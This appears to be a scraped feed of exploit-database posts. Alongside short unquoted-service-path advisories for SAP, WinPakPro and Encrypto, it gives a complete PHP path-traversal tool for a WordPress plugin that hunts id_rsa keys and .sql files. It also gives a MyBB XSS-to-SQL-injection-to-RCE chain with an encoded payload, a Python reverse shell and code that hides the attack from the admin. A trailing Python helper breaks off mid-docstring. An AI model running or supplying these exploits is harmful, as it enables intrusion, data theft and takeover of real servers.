All posts by ISHACK AI BOT

  1. # Exploit Title: SAPSetup Automatic Workstation Update Service 750 - 'NWSAPAutoWorkstationUpdateSvc' Unquoted Service Path
     # Discovery by: Alan Mondragon
     # Discovery Date: 2021-03-16
     # Vendor Homepage: https://help.sap.com/
     # Software Links : https://help.sap.com/
     # SAP
     # Tested Version: 750 Final Release
     # Vulnerability Type: Unquoted Service Path
     # Tested on OS: Windows 10 Pro 64 bits

     # Step to discover Unquoted Service Path:

     C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

     SAPSetup Automatic Workstation Update Service   NWSAPAutoWorkstationUpdateSvc   C:\Program Files (x86)\SAP\SAPsetup\Setup\Updater\NwSapAutoWorkstationUpdateService.exe   Auto

     C:\>sc qc "NWSAPAutoWorkstationUpdateSvc"
     [SC] QueryServiceConfig SUCCESS

     SERVICE_NAME: NWSAPAutoWorkstationUpdateSvc
             TYPE               : 10  WIN32_OWN_PROCESS
             START_TYPE         : 2   AUTO_START  (DELAYED)
             ERROR_CONTROL      : 1   NORMAL
             BINARY_PATH_NAME   : C:\Program Files (x86)\SAP\SAPsetup\Setup\Updater\NwSapAutoWorkstationUpdateService.exe
             LOAD_ORDER_GROUP   :
             TAG                : 0
             DISPLAY_NAME       : SAPSetup Automatic Workstation Update Service
             DEPENDENCIES       : RPCSS
             SERVICE_START_NAME : LocalSystem

     # Exploit:
     A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  2. # Exploit Title: Winpakpro 4.8 - 'ScheduleService' Unquoted Service Path
     # Discovery by: Alan Mondragon
     # Discovery Date: 2021-03-16
     # Vendor Homepage: https://www.security.honeywell.com/product-repository/winpak
     # Software Links : https://www.security.honeywell.com/product-repository/winpak
     # WinPackPro
     # Tested Version: 4.8
     # Vulnerability Type: Unquoted Service Path
     # Tested on OS: Windows 10 Pro 64 bits

     # Step to discover Unquoted Service Path:

     C:\WINDOWS\system32>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

     WIN-PAK ScheduleService   ScheduleService   C:\Program Files <x86>\WINPAKPRO\ScheduleService Service.exe   Auto

     C:\Users\jorge.irigoyen>sc qc "ScheduleService"
     [SC] QueryServiceConfig SUCCESS

     SERVICE_NAME: CtesDurSvc
             TYPE               : 10  WIN32_OWN_PROCESS
             START_TYPE         : 2   AUTO_START  <DELAYED>
             ERROR_CONTROL      : 1   NORMAL
             BINARY_PATH_NAME   : C:\Program Files <x86>\WINPAKPRO\ScheduleService Service.exe
             LOAD_ORDER_GROUP   :
             TAG                : 0
             DISPLAY_NAME       : WIN-PAK Schedule Service
             DEPENDENCIES       : WPDatabaseService
             SERVICE_START_NAME : LocalSystem

     (The sc output above was captured on a Spanish-language Windows and is translated here; the field names are the English equivalents.)

     # Exploit:
     A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  3. # Exploit Title: Winpakpro 4.8 - 'WPCommandFileService' Unquoted Service Path
     # Discovery by: Alan Mondragon
     # Discovery Date: 2021-03-16
     # Vendor Homepage: https://www.security.honeywell.com/product-repository/winpak
     # Software Links : https://www.security.honeywell.com/product-repository/winpak
     # WinPackPro
     # Tested Version: 4.8
     # Vulnerability Type: Unquoted Service Path
     # Tested on OS: Windows 10 Pro 64 bits

     # Step to discover Unquoted Service Path:

     C:\WINDOWS\system32>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

     WIN-PAK WPCommandFileService   WPCommandFileService   C:\Program Files <x86>\WINPAKPRO\WPCommandFileService Service.exe   Auto

     C:\Users\jorge.irigoyen>sc qc "WPCommandFileService"
     [SC] QueryServiceConfig SUCCESS

     SERVICE_NAME: CtesDurSvc
             TYPE               : 10  WIN32_OWN_PROCESS
             START_TYPE         : 2   AUTO_START  <DELAYED>
             ERROR_CONTROL      : 1   NORMAL
             BINARY_PATH_NAME   : C:\Program Files <x86>\WINPAKPRO\WPCommandFileService Service.exe
             LOAD_ORDER_GROUP   :
             TAG                : 0
             DISPLAY_NAME       : WIN-PAK Command File Service
             DEPENDENCIES       : WPDatabaseService
             SERVICE_START_NAME : LocalSystem

     (The sc output above was captured on a Spanish-language Windows and is translated here; the field names are the English equivalents.)

     # Exploit:
     A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  4. # Exploit Title: WordPress Plugin Delightful Downloads Jquery File Tree 1.6.6 - Path Traversal
     # Date: 19/03/2021
     # Exploit Author: Nicholas Ferreira
     # Vendor Homepage: https://github.com/A5hleyRich/delightful-downloads
     # Version: <=1.6.6
     # Tested on: Debian 11
     # CVE : CVE-2017-1000170
     # PHP version (exploit): 7.3.27

     # POC:
     curl --data "dir=/etc/" http://example.com/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php

     <?php
     $vuln_file = "/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php"; // do not change

     $agents = [
         "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 6.0; Trident/3.0)",
         "Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2 like Mac OS X; sl-SI) AppleWebKit/531.37.3 (KHTML, like Gecko) Version/4.0.5 Mobile/8B119 Safari/6531.37.3",
         "Mozilla/5.0 (Macintosh; PPC Mac OS X 10_6_6 rv:6.0) Gecko/20120629 Firefox/35.0",
         "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.1)",
         "Mozilla/5.0 (iPad; CPU OS 7_2_2 like Mac OS X; sl-SI) AppleWebKit/531.5.4 (KHTML, like Gecko) Version/3.0.5 Mobile/8B113 Safari/6531.5.4",
         "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7_0) AppleWebKit/5321 (KHTML, like Gecko) Chrome/37.0.837.0 Mobile Safari/5321",
         "Mozilla/5.0 (Windows; U; Windows NT 6.0) AppleWebKit/535.12.4 (KHTML, like Gecko) Version/5.1 Safari/535.12.4",
         "Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X; en-US) AppleWebKit/531.18.4 (KHTML, like Gecko) Version/4.0.5 Mobile/8B118 Safari/6531.18.4",
         "Mozilla/5.0 (Windows; U; Windows NT 5.1) AppleWebKit/531.12.4 (KHTML, like Gecko) Version/4.0.3 Safari/531.12.4",
         "Mozilla/5.0 (compatible; MSIE 5.0; Windows 98; Win 9x 4.90; Trident/5.0)",
         "Opera/8.98 (Windows NT 5.0; en-US) Presto/2.11.268 Version/10.00",
         "Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X; sl-SI) AppleWebKit/534.16.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B111 Safari/6534.16.2",
         "Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100107 Firefox/36.0",
         "Mozilla/5.0 (Windows; U; Windows CE) AppleWebKit/535.23.6 (KHTML, like Gecko) Version/4.0.2 Safari/535.23.6",
         "Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20120805 Firefox/36.0",
         "Mozilla/5.0 (X11; Linux x86_64; rv:7.0) Gecko/20130123 Firefox/37.0",
         "Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 6.0; Trident/4.1)",
         "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_9 rv:6.0) Gecko/20190226 Firefox/36.0",
         "Mozilla/5.0 (Windows; U; Windows NT 5.0) AppleWebKit/533.39.1 (KHTML, like Gecko) Version/4.0.3 Safari/533.39.1",
         "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_1 rv:4.0) Gecko/20160603 Firefox/37.0",
         "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/5341 (KHTML, like Gecko) Chrome/37.0.831.0 Mobile Safari/5341",
         "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_9 rv:5.0; en-US) AppleWebKit/532.20.3 (KHTML, like Gecko) Version/4.0 Safari/532.20.3",
         "Opera/9.74 (X11; Linux x86_64; sl-SI) Presto/2.10.265 Version/12.00",
         "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/5340 (KHTML, like Gecko) Chrome/37.0.813.0 Mobile Safari/5340",
         "Opera/9.60 (Windows NT 6.2; en-US) Presto/2.9.333 Version/11.00",
         "Mozilla/5.0 (Macintosh; PPC Mac OS X 10_8_2) AppleWebKit/5362 (KHTML, like Gecko) Chrome/40.0.862.0 Mobile Safari/5362",
         "Opera/9.74 (Windows NT 5.0; en-US) Presto/2.8.188 Version/10.00",
         "Mozilla/5.0 (Windows; U; Windows NT 4.0) AppleWebKit/531.17.1 (KHTML, like Gecko) Version/5.1 Safari/531.17.1",
         "Opera/9.93 (Windows CE; sl-SI) Presto/2.12.174 Version/12.00",
         "Opera/8.19 (X11; Linux i686; en-US) Presto/2.12.301 Version/10.00",
         "Mozilla/5.0 (Windows; U; Windows NT 5.2) AppleWebKit/532.7.2 (KHTML, like Gecko) Version/4.0.4 Safari/532.7.2",
         "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)",
         "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 4.0; Trident/3.0)",
         "Opera/9.71 (X11; Linux x86_64; en-US) Presto/2.12.270 Version/12.00",
         "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 6.2; Trident/4.1)",
         "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2 rv:4.0) Gecko/20130506 Firefox/37.0",
         "Mozilla/5.0 (Windows; U; Windows 95) AppleWebKit/531.44.7 (KHTML, like Gecko) Version/4.0.4 Safari/531.44.7",
         "Mozilla/5.0 (Windows NT 6.1; en-US; rv:1.9.1.20) Gecko/20110731 Firefox/35.0",
         "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/5341 (KHTML, like Gecko) Chrome/37.0.831.0 Mobile Safari/5341",
         "Opera/9.74 (X11; Linux x86_64; sl-SI) Presto/2.10.265 Version/12.00",
         "Opera/9.60 (Windows NT 6.2; en-US) Presto/2.9.333 Version/11.00",
         "Mozilla/5.0 (iPad; CPU OS 7_0_2 like Mac OS X; en-US) AppleWebKit/535.7.5 (KHTML, like Gecko) Version/4.0.5 Mobile/8B115 Safari/6535.7.5",
         "Mozilla/5.0 (Macintosh; PPC Mac OS X 10_8_2) AppleWebKit/5362 (KHTML, like Gecko) Chrome/40.0.862.0 Mobile Safari/5362",
         "Opera/9.74 (Windows NT 5.0; en-US) Presto/2.8.188 Version/10.00",
         "Mozilla/5.0 (Windows; U; Windows NT 4.0) AppleWebKit/531.17.1 (KHTML, like Gecko) Version/5.1 Safari/531.17.1",
         "Opera/9.93 (Windows CE; sl-SI) Presto/2.12.174 Version/12.00",
         "Mozilla/5.0 (Windows; U; Windows 98; Win 9x 4.90) AppleWebKit/535.13.4 (KHTML, like Gecko) Version/4.0.4 Safari/535.13.4",
         "Opera/8.19 (X11; Linux i686; en-US) Presto/2.12.301 Version/10.00",
         "Mozilla/5.0 (Windows; U; Windows NT 5.2) AppleWebKit/532.7.2 (KHTML, like Gecko) Version/4.0.4 Safari/532.7.2",
         "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)",
         "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 4.0; Trident/3.0)",
         "Opera/9.71 (X11; Linux x86_64; en-US) Presto/2.12.270 Version/12.00",
         "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 6.2; Trident/4.1)",
         "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2 rv:4.0) Gecko/20130506 Firefox/37.0",
         "Mozilla/5.0 (Windows; U; Windows 95) AppleWebKit/531.44.7 (KHTML, like Gecko) Version/4.0.4 Safari/531.44.7",
         "Mozilla/5.0 (Windows NT 6.1; en-US; rv:1.9.1.20) Gecko/20110731 Firefox/35.0",
         "Opera/8.11 (X11; Linux x86_64; en-US) Presto/2.11.165 Version/11.00",
         "Mozilla/5.0 (iPad; CPU OS 7_2_1 like Mac OS X; en-US) AppleWebKit/532.33.6 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6532.33.6",
         "Opera/9.71 (X11; Linux x86_64; sl-SI) Presto/2.10.180 Version/11.00",
         "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_1 rv:5.0) Gecko/20130122 Firefox/36.0",
         "Mozilla/5.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; Trident/3.0)",
         "Mozilla/5.0 (compatible; MSIE 10.0; Windows 95; Trident/4.1)",
         "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.1)",
         "Opera/8.33 (X11; Linux x86_64; en-US) Presto/2.8.320 Version/12.00",
         "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20121221 Firefox/36.0",
         "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_9 rv:4.0) Gecko/20200625 Firefox/35.0",
         "Mozilla/5.0 (Windows NT 6.0; sl-SI; rv:1.9.0.20) Gecko/20200505 Firefox/37.0",
         "Mozilla/5.0 (Windows; U; Windows NT 4.0) AppleWebKit/532.44.4 (KHTML, like Gecko) Version/5.0 Safari/532.44.4",
         "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_9 rv:3.0) Gecko/20201229 Firefox/37.0",
         "Mozilla/5.0 (Windows; U; Windows NT 5.1) AppleWebKit/531.17.6 (KHTML, like Gecko) Version/4.1 Safari/531.17.6",
         "Mozilla/5.0 (X11; Linux i686) AppleWebKit/5311 (KHTML, like Gecko) Chrome/38.0.877.0 Mobile Safari/5311",
         "Mozilla/5.0 (Windows; U; Windows NT 6.2) AppleWebKit/531.4.3 (KHTML, like Gecko) Version/5.1 Safari/531.4.3",
         "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_0 rv:4.0) Gecko/20140118 Firefox/35.0",
         "Mozilla/5.0 (Windows 95) AppleWebKit/5330 (KHTML, like Gecko) Chrome/36.0.847.0 Mobile Safari/5330",
         "Opera/8.39 (Windows 98; sl-SI) Presto/2.9.202 Version/11.00",
         "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_5 rv:3.0; en-US) AppleWebKit/534.11.4 (KHTML, like Gecko) Version/5.0 Safari/534.11.4"
     ];

     // POST dir=<path> to the vulnerable connector and return the raw HTML listing it answers with
     function post_request($url, $data, $random_agent = 0){
         global $agents;
         $ch = curl_init();
         curl_setopt($ch, CURLOPT_URL, $url);
         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
         curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
         curl_setopt($ch, CURLOPT_POST, true);
         curl_setopt($ch, CURLOPT_POSTFIELDS, array("dir" => $data));
         #curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8080"); // debug w/ burp
         if($random_agent){
             curl_setopt($ch, CURLOPT_USERAGENT, $agents[rand(0, count($agents) - 1)]);
         }
         $output = curl_exec($ch);
         curl_close($ch);
         return $output;
     }

     // The connector marks every entry of the listing with rel="<full path>"; collect those values.
     // Folders come back with a trailing slash, files without one.
     function parse_dir($str){ // by raina77ow =)
         $contents = array();
         $startFrom = $contentStart = $contentEnd = 0;
         while (false !== ($contentStart = strpos($str, 'rel="', $startFrom))){
             $contentStart += 5;
             $contentEnd = strpos($str, '">', $contentStart);
             if (false === $contentEnd){
                 break;
             }
             $contents[] = substr($str, $contentStart, $contentEnd - $contentStart);
             $startFrom = $contentEnd + 2;
         }
         return $contents;
     }

     function list_files($url, $path, $recursive, $filter){
         global $vuln_file;
         global $random_agent;

         $has_filter = (count($filter) > 0) ? 1 : 0;
         $parsed = parse_dir(post_request($url.$vuln_file, $path, $random_agent)); // array tree

         foreach($parsed as $file_or_folder){
             if($has_filter){
                 foreach($filter as $filtered){
                     if(strpos($file_or_folder, $filtered) !== false){ // the current entry contains one of the filter strings
                         echo "    ".$file_or_folder."\n";
                         continue;
                     }
                     if(preg_match("#^\/.*\/$#", $file_or_folder)){ // is a folder
                         if($recursive){ // if the recursive flag is set, enter each folder and do it again
                             list_files($url, $file_or_folder, $recursive, $filter);
                         }
                         continue 2; // continue the outermost foreach
                     }
                 }
                 continue; // with a filter set, always restart the loop here
             }
             if(preg_match("#^\/.*\/$#", $file_or_folder)){ // is a folder
                 if($recursive){ // if the recursive flag is set, enter each folder and do it again
                     list_files($url, $file_or_folder, $recursive, $filter);
                 }else{
                     echo "    ".$file_or_folder."\n"; // not recursive: just print the folder name
                 }
             }else{ // is a file
                 echo "    ".$file_or_folder."\n";
             }
         }
     }

     function alert_user($target, $path, $recursive, $filter){
         // scanning the root of the server recursively can really be a pain
         if($path == "/" && $recursive == 1){
             echo red(" [i] WARNING: Scanning the root of the webserver recursively can exceed the timeout limit, block your IP or even take down the server. Are you sure you want to continue? [y/N] ");
             $handle = fopen("php://stdin", "r");
             $line = fgets($handle);
             if(trim(strtoupper($line)) != 'Y'){
                 echo "\n Aborted. Try running me without the recursion flag\n\n";
                 exit;
             }
             fclose($handle);
             echo cyan("\n\n Ok, don't say I didn't warn you...\n");
         }
         list_files($target, $path, $recursive, $filter);
     }

     ############################################################

     function green($str){  return "\e[92m".$str."\e[0m"; }
     function red($str){    return "\e[91m".$str."\e[0m"; }
     function yellow($str){ return "\e[93m".$str."\e[0m"; }
     function cyan($str){   return "\e[96m".$str."\e[0m"; }

     function banner(){
         echo "
       _____       _ _       _     _    __       _ _______
      |  __ \     | (_)     | |   | |  / _|     | |__   __|
      | |  | | ___| |_  __ _| |__ | |_| |_ _   _| | | |_ __ ___  ___
      | |  | |/ _ \ | |/ _` | '_ \| __|  _| | | | | | | '__/ _ \/ _ \
      | |__| |  __/ | | (_| | | | | |_| | | |_| | | | | | |  __/  __/
      |_____/ \___|_|_|\__, |_| |_|\__|_|  \__,_|_| |_|_|  \___|\___|
                        __/ |                      ".green("Coder: ").yellow("Nicholas Ferreira")."
                       |___/                       0x7359

                 ".cyan("Delightful Downloads - Jquery File Tree")." Unauthenticated Path Traversal exploit".red("\n                                 (CVE-2017-1000170)")."

     ";
     }

     // ======================= CHECKING =======================
     $short_args = "u:h::p:r::f:a::";
     $long_args = array("url:", "help::", "path:", "recursive::", "filter:", "random-agent::");
     $options = getopt($short_args, $long_args);

     if($argc == 1){
         die(banner()." Usage: php xpl_jqueryFileTree.php -u url [-f extensions] [-p path] [-r] [-h] [-a]\n\n Help: -h or --help\n\n");
     }

     if(isset($options['h']) || isset($options['help'])){
         banner();
         die("
      Usage: php ".$argv[0]." -u url [-f extensions/filenames] [-p path] [-r] [-h] [-a]

      -h, --help:         Show this message
      -u, --url:          URL of target
      -a, --random-agent: Use random user agents
      -f, --filter:       Name of files or extensions to search for (separated by comma)
      -p, --path:         The full path from which the filenames will be read (default: /)
      -r, --recursive:    Generates the tree recursively (be careful)

      e.g.: ".cyan($argv[0]." -u victim.com -f .zip,.sql -p /var/www/html/backup/admin/ -r")."
            |
            \-> This will search for all .zip and .sql files inside victim.com/backup/admin and its subpaths
                (You must provide the dot to indicate it's an extension)

            ".cyan($argv[0]." -u victim.com -f .log,id_rsa -a -r")."
            |
            \-> This will search for all files named \"id_rsa\" or having the extension \".log\" within all folders of the server, with random user-agents

      ".yellow("Tip: use \"php ..... | tee output\" to save the result to an output file")."

     ");
     }

     $random_agent = 0;
     if(isset($options['a'])){
         $random_agent = 1;
     }elseif(isset($options['random-agent'])){
         $random_agent = 1;
     }

     $target = "";
     if(isset($options['u'])){
         $target = $options['u'];
     }elseif(isset($options['url'])){
         $target = $options['url'];
     }

     $recursive = 0;
     if(isset($options['r'])){
         $recursive = 1;
     }elseif(isset($options['recursive'])){
         $recursive = 1;
     }

     $path = "/";
     if(isset($options['p'])){
         $path = $options['p'];
     }elseif(isset($options['path'])){
         $path = $options['path'];
     }
     if($path !== "/"){
         if(!preg_match("#^\/.*\/$#", $path)){
             $path = str_replace("//", "/", "/".$path."/"); // $path must be of the form /<path>/ for this to work, so let's force it
         }
     }

     $extensions = "";
     if(isset($options['f'])){
         $extensions = $options['f']; // string
     }elseif(isset($options['filter'])){
         $extensions = $options['filter']; // string
     }

     $filter = array();
     if($extensions !== ""){
         $filter = explode(",", $extensions);
     }
     // ========================= END CHECKING ==========================

     function is_vulnerable($url){
         global $vuln_file;
         global $random_agent;
         global $filter;

         echo " [*] Target: ".$url."\n";
         if(count($filter) > 0){
             echo " [*] Filter: ".implode(", ", $filter)."\n\n";
         }
         echo cyan(" [i] Checking if the target is vulnerable...\n");

         $ch = curl_init();
         curl_setopt($ch, CURLOPT_URL, $url.$vuln_file);
         curl_setopt($ch, CURLOPT_NOBODY, true); // HEAD request to vulnerable file
         curl_exec($ch);
         $code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
         curl_close($ch);

         if(substr($code, 0, 1) == 2){ // 2xx
             echo yellow(" [i] HTTP response of vulnerable file is 2xx. May be vulnerable!\n");
             // a listing of / that names system directories proves the connector reads outside the upload dir
             $post = post_request($url.$vuln_file, "/", $random_agent);
             if(preg_match("/jqueryfiletree.*(bin|boot|dev|etc|var|usr|windows|users|temp)/", strtolower($post))){
                 echo green(" [+] Target is vulnerable! Getting file list...\n\n");
                 return true;
             }
             echo red(" [-] Target is not vulnerable... =(\n\n");
         }else{
             echo red(" [-] Could not find a valid vulnerable file. Maybe it doesn't exist, you don't have permission to read it or it is in another directory.\n");
         }
         return false;
     }

     banner();
     if(is_vulnerable($target)){
         alert_user($target, $path, $recursive, $filter);
         echo green("\n [+] Done!\n\n");
     }
     ?>
  5. # Exploit Title: MacPaw Encrypto 1.0.1 - 'Encrypto Service' Unquoted Service Path
     # Discovery by: Ismael Nava
     # Discovery Date: 03-19-2020
     # Vendor Homepage: https://macpaw.com/encrypto
     # Software Links : https://dl.devmate.com/com.macpaw.win.Encrypto/EncryptoforWin.exe?cid=78456412.1616181092
     # Tested Version: 1.0.1
     # Vulnerability Type: Unquoted Service Path
     # Tested on OS: Windows 10 64 bits

     # Step to discover Unquoted Service Path:

     C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """

     Encrypto Service   Encrypto.Service   C:\Program Files\Encrypto\Encrypto.Service.exe   Auto

     C:\>sc qc "Encrypto.Service"
     [SC] QueryServiceConfig SUCCESS

     SERVICE_NAME: Encrypto.Service
             TYPE               : 10  WIN32_OWN_PROCESS
             START_TYPE         : 2   AUTO_START  (DELAYED)
             ERROR_CONTROL      : 1   NORMAL
             BINARY_PATH_NAME   : C:\Program Files\Encrypto\Encrypto.Service.exe
             LOAD_ORDER_GROUP   :
             TAG                : 0
             DISPLAY_NAME       : Encrypto Service
             DEPENDENCIES       :
             SERVICE_START_NAME : LocalSystem

     (The sc output above was captured on a Spanish-language Windows and is translated here; the field names are the English equivalents.)
  6. # Exploit Title: MyBB 1.8.25 - Chained Remote Command Execution
     # Exploit Author: SivertPL ([email protected])
     # Date: 19.03.2021
     # Description: Nested autourl Stored XSS -> templateset second order SQL Injection leading to RCE through improper string interpolation in eval().
     # Software Link: https://resources.mybb.com/downloads/mybb_1825.zip
     # CVE: CVE-2021-27889, CVE-2021-27890
     # Reference: https://portswigger.net/daily-swig/chained-vulnerabilities-used-to-take-control-of-mybb-forums
     # The exploit requires the target administrator to have a valid ACP session.
     # Proof of Concept Video: https://www.youtube.com/watch?v=xU1Y9_bgoFQ

     # Guide:

     1) In order to escape various checks, the XSS has to download this .js file from an external server, and then execute it. Please replace the source of the following script node with a URL pointing to the second stage .js file (this file) to be downloaded by the target.

        document.write('<script src=http://localhost:8000/second_stage.js></script>');

     2) Please encode the aforementioned JS payload with String.fromCharCode, to achieve a constraint-less JavaScript execution environment. You can use this website: https://eve.gd/2007/05/23/string-fromcharcode-encoder/

     3) Put the resulting encoded payload in the nested autourl vulnerability vector:

        [img]http://xyzsomething.com/image?)http://x.com/onerror=<FCC ENCODED PAYLOAD>;//[/img]

     4) The final payload should look like this:

        [img]http://xyzsomething.com/image?)http://x.com/onerror=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,108,111,99,97,108,104,111,115,116,58,56,48,48,48,47,119,111,114,109,46,106,115,62,60,47,115,99,114,105,112,116,62,39,41,59));//[/img]

     5) Send the full vector to the target, either by private message, a post, or any other place where MyCode (BBCode) is supported. Once the target's browser renders the page, the XSS vulnerability will fire and download & execute the second stage payload from the website specified above, using document.write() to 'bypass' SOP. After the execution of the payload, you should receive a reverse shell, provided the admin has a valid ACP session.

     6) Enjoy your RCE!

     For educational purposes only.

     const REVERSE_SHELL_IP = "localhost";
     const REVERSE_SHELL_PORT = 5554;
     const PAYLOAD_XML_NAME = "payload";
     const PAYLOAD_XML_VERSION = "1821";
     const XML_PROLOG = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>";
     const SHELL_PAYLOAD = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"" + REVERSE_SHELL_IP + "\"," + REVERSE_SHELL_PORT + "));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'";
     const SQL_PAYLOAD = "') AND 1=0 UNION SELECT title, '${passthru(base64_decode(\\'" + btoa(SHELL_PAYLOAD) + "\\'))}' from mybb_templates -- ";

     // Trigger the actual vulnerability, force cache reload.
     // Stage: Final
     function trigger() {
         var request = new XMLHttpRequest();
         request.open('GET', '/index.php');
         request.send();
     }

     // Poison the cache.
     // Stage: 6
     function set_as_default(token, tid) {
         var request = new XMLHttpRequest();
         request.open('GET', '/admin/index.php?module=style-themes&action=set_default&tid=' + tid + '&my_post_key=' + token);
         request.onload = function() {
             trigger();
         };
         request.send();
     }

     // Get the TID of the downloaded theme payload
     // Stage: 5
     function get_payload_tid(token) {
         var request = new XMLHttpRequest();
         request.open('GET', '/admin/index.php?module=style-themes');
         request.responseType = "document";
         request.onload = function() {
             var response = request.response;
             var aTags = response.getElementsByTagName("a");
             var searchText = "payload";
             var found;
             for (var i = 0; i < aTags.length; i++) {
                 if (aTags[i].textContent == searchText) {
                     found = aTags[i];
                     break;
                 }
             }
             var href = found.getAttribute("href");
             var urlParams = new URLSearchParams(href);
             var tid = urlParams.get("tid");
             set_as_default(token, tid);
         };
         request.send();
     }

     // We pass the actual request to upload the template exploiting the second link of the exploit chain
     // Stage: 4
     function upload_template(token) {
         var request = new XMLHttpRequest();
         request.open('POST', '/admin/index.php?module=style-themes&action=import');
         var data = new FormData();
         data.append('my_post_key', token);
         data.append('local_file', build_payload(), PAYLOAD_XML_NAME + ".xml");
         data.append('import', 0);
         data.append('url', '');
         data.append('tid', '1');
         data.append('name', "payload");
         data.append("version_compat", 1);
         data.append("import_stylesheets", 1);
         data.append("import_templates", 1);
         request.onload = function() {
             // After uploading the template, set it as default to poison the cache
             get_payload_tid(token);
         };
         request.send(data);
     }

     // Build the rogue XML Template exploiting SQL Injection leading to RCE through PHP evaluation.
     // Stage: 3
     function build_payload() {
         var xmlDom = document.implementation.createDocument("", "", null);
         var theme = xmlDom.createElement("theme");
         theme.setAttribute("name", PAYLOAD_XML_NAME);
         theme.setAttribute("version", PAYLOAD_XML_VERSION);
         var properties = xmlDom.createElement("properties");
         theme.appendChild(properties);
         var template_set = xmlDom.createElement("templateset");
         template_set.innerHTML = SQL_PAYLOAD;
         properties.appendChild(template_set);
         xmlDom.appendChild(theme);
         var serialized = new XMLSerializer().serializeToString(xmlDom);
         var result = XML_PROLOG + serialized;
         var file = new File([result], PAYLOAD_XML_NAME);
         return file;
     }

     // Acquire the anti-CSRF token
     // Stage: 2
     function acquire_token(request) {
         var response = request.response;
         var token = response.getElementsByName("my_post_key")[0].value;
         if (token == null) {
             /* ACP Session either expired or wasn't established to begin with */
             return;
         }
         // We have acquired the anti-CSRF token now.
         upload_template(token);
     }

     // ACP Code Execution
     // Stage: 1
     function exec_acp() {
         var request = new XMLHttpRequest();
         request.open('GET', 'admin/index.php?module=style-themes&action=import');
         request.responseType = "document";
         request.onload = function() {
             acquire_token(request);
         };
         request.send();
     }

     // We hide the payload, to raise less suspicion
     // Stage: 0
     function hide() {
         var getAll = document.querySelectorAll("[src*='http://xyzsomething.com/image?)<a href=']");
         getAll.forEach(element => {
             var pNode = element.parentNode.innerText = "lmao whatever you say";
         });
     }

     // Entry point of the exploit
     function start() {
         hide();
         exec_acp();
     }

     start();
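Steps 1 to 4 of the post above hand the String.fromCharCode encoding off to an external website. The Python below is an added example, not part of SivertPL's exploit: it builds the same `[img]` autourl vector from a second-stage URL, and, for the defender reading MyCode bodies or PMs, decodes any `String.fromCharCode(...)` literal back into readable JavaScript. The vector shape and the `document.write()` loader are copied from the post; the only assumption is the second-stage URL passed in.

```python
"""Build and decode the nested-autourl XSS vector used in the MyBB chain (added example)."""
import re

# Loader and vector template exactly as they appear in steps 1 and 3 of the post.
LOADER = "document.write('<script src=%s></script>');"
VECTOR = "[img]http://xyzsomething.com/image?)http://x.com/onerror=%s;//[/img]"

_FCC = re.compile(r"String\.fromCharCode\(([\d,\s]+)\)")


def fromcharcode_encode(js):
    """Return eval(String.fromCharCode(...)) for `js`.

    No quotes, brackets or slashes from the payload survive in the vector, which is
    why the post calls the result a constraint-less execution environment.  The
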